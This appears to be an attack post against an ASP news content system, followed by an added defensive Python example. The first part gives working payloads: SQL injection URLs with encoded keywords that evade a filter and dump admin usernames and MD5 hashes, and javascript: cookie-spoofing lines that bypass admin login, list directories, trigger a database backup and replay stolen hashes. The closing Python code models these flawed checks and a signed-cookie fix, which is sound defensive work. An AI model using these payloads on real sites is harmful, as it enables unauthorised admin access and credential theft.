I. Injection

1. news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2

(%41, %53 and %46 are the URL-encoded letters A, S and F, so the server decodes the parameter to "And 1=2 union Select ... From Admin ..."; the keywords are encoded this way evidently to slip past a keyword filter on and/select/from. %26 is an encoded &, so that it reaches the query as a literal character instead of being treated as a query-string separator, and 0x3b is the ASCII code of ";", intended as a separator so the user and pass fields come back as user;pass.)

2. Step one: javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp"
Step two: request admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
This returns the username and the MD5 hash of the password.
II. Cookie spoofing

1. Straight into the admin area. Applies to older versions; generally the versions where login.asp and admin_index.asp sit in the same directory have this hole. The 'or'='or' values work because the admin pages evidently rebuild the login query from these cookies without escaping them.
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"

2. Directory listing.
javascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."

3. Database backup (seems to apply to fewer versions).
javascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"

4. Getting into the admin area when you have the MD5 hash but cannot crack it. The adminpass cookie carries the stored hash rather than the cleartext password, so the hash obtained from the injection in section I can be replayed as-is; substitute the username and hash for the two placeholders.
javascript:alert(document.cookie="adminuser="+escape("USERNAME"));alert(document.cookie="adminpass="+escape("MD5HASH"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
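As an added example (not code from the original post), the following Python models the authentication checks that the cookie tricks in section II defeat, and a server-signed session cookie that closes them. The legacy checks are hypothetical reconstructions inferred from which cookies the payloads set (items 2 and 3 only set admindj; item 4 replays the hash in adminpass); the post does not show the ASP source. The admin record, password, column names and SERVER_SECRET are constructed for the example. The string-built login query that 'or'='or' exploits in item 1 is not modelled here; the point shown is that anything the client can set by hand is not evidence of a login.

```python
# Added example, not code from the original post. It models in Python the
# cookie-trusting checks behind section II and an HMAC-signed replacement.
# The legacy checks are hypothetical reconstructions; the post shows no ASP.
import hashlib
import hmac
import secrets
import sqlite3
from http.cookies import SimpleCookie
from typing import Optional
from urllib.parse import quote, unquote

# Constructed admin record, stored as an MD5 hash as the post says the target does.
ADMIN_USER = "admin"
ADMIN_MD5 = hashlib.md5(b"constructed-password").hexdigest()
# Server-side secret: generated per process, never sent to the client.
SERVER_SECRET = secrets.token_bytes(32)


def _admin_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (user TEXT, pass TEXT)")
    conn.execute("INSERT INTO admin VALUES (?, ?)", (ADMIN_USER, ADMIN_MD5))
    return conn


def _cookies(header: str) -> dict:
    """Parse a Cookie header into {name: decoded value}. escape() in the
    javascript: URLs percent-encodes, so values are unquoted here."""
    return {k: unquote(m.value) for k, m in SimpleCookie(header).items()}


def forged_cookie(user: str = "", password: str = "", dj: str = "1") -> str:
    """Cookie header the document.cookie assignments in section II produce."""
    parts = []
    if user:
        parts.append(f"adminuser={quote(user)}")
    if password:
        parts.append(f"adminpass={quote(password)}")
    parts.append(f"admindj={dj}")
    return "; ".join(parts)


def legacy_flag_check(header: str) -> bool:
    """Items 2 and 3: the upload and backup pages only look at admindj,
    a flag the client sets itself."""
    return _cookies(header).get("admindj") == "1"


def legacy_hash_check(header: str) -> bool:
    """Item 4: the admin index also compares adminuser/adminpass with the
    stored row, but the cookie carries the MD5 digest itself, so a hash read
    out via the injection is replayed without ever being cracked."""
    c = _cookies(header)
    if c.get("admindj") != "1":
        return False
    conn = _admin_db()
    row = conn.execute("SELECT 1 FROM admin WHERE user=? AND pass=?",
                       (c.get("adminuser", ""), c.get("adminpass", ""))).fetchone()
    conn.close()
    return row is not None


def issue_session(user: str, password: str) -> Optional[str]:
    """Hardened login: verify the credentials server-side, then hand out a
    cookie whose only content is an opaque token plus an HMAC over it.
    (MD5 is kept only to match the post's storage; it is not a recommendation.)"""
    conn = _admin_db()
    row = conn.execute("SELECT 1 FROM admin WHERE user=? AND pass=?",
                       (user, hashlib.md5(password.encode()).hexdigest())).fetchone()
    conn.close()
    if row is None:
        return None
    token = f"{user}:{secrets.token_hex(16)}"
    sig = hmac.new(SERVER_SECRET, token.encode(), hashlib.sha256).hexdigest()
    return f"session={quote(token + '.' + sig)}"


def hardened_check(header: str) -> bool:
    """Nothing the client can type into document.cookie is trusted: the
    signature must verify under SERVER_SECRET, which the client never sees."""
    value = _cookies(header).get("session", "")
    token, _, sig = value.rpartition(".")
    if not token:
        return False
    expected = hmac.new(SERVER_SECRET, token.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(sig, expected)


if __name__ == "__main__":
    print("admindj=1 alone, legacy:   ", legacy_flag_check(forged_cookie()))
    print("replayed hash, legacy:     ", legacy_hash_check(forged_cookie("admin", ADMIN_MD5)))
    print("replayed hash, hardened:   ", hardened_check(forged_cookie("admin", ADMIN_MD5)))
    good = issue_session("admin", "constructed-password")
    print("real login, hardened:      ", hardened_check(good))
    print("tampered token, hardened:  ", hardened_check(good.replace("admin", "root", 1)))
```

A signed cookie stops the client from minting its own login state; it does not by itself protect against a cookie stolen from a real session, which still needs expiry and server-side revocation.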